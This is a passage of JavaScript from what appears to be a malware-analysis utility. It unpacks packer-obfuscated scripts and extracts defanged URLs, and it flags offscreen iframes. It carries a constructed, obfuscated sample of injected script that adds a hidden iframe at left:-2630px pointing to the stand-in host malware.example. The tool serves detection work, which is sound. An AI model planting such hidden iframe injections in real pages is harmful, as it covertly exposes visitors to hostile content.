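  return payload.value.replace(/\b\w+\b/g, (t) => (dict.has(t) ? dict.get(t) : t));
}

// Pull reportable indicators out of unpacked text; URLs come back defanged.
function indicators(code) {
  const urls = [...new Set(code.match(/https?:\/\/[^\s'"<>\\)]+/g) || [])];
  return {
    urls: urls.map((u) => u.replace(/^http/i, 'hxxp').replace(/\./g, '[.]')),
    offscreenIframe: /<iframe\b/i.test(code) && /\b(left|top)\s*:\s*-\d{3,}px/i.test(code),
  };
}

// Constructed sample, not the page's payload; the decoder body is elided (never run).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* elided */return p}('0 b=\'3://4.5/6\';7.8.9+=\'<1 a="c:d;e:-f"><2 g="\'+b+\'"></2></1>\'',62,17,'var|div|iframe|http|malware|example|landing|document|body|innerHTML|style||position|absolute|left|2630px|src'.split('|'),0,{}))`;

const unpacked = unpack(SAMPLE);
console.log(unpacked);
console.log(indicators(unpacked));
```
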
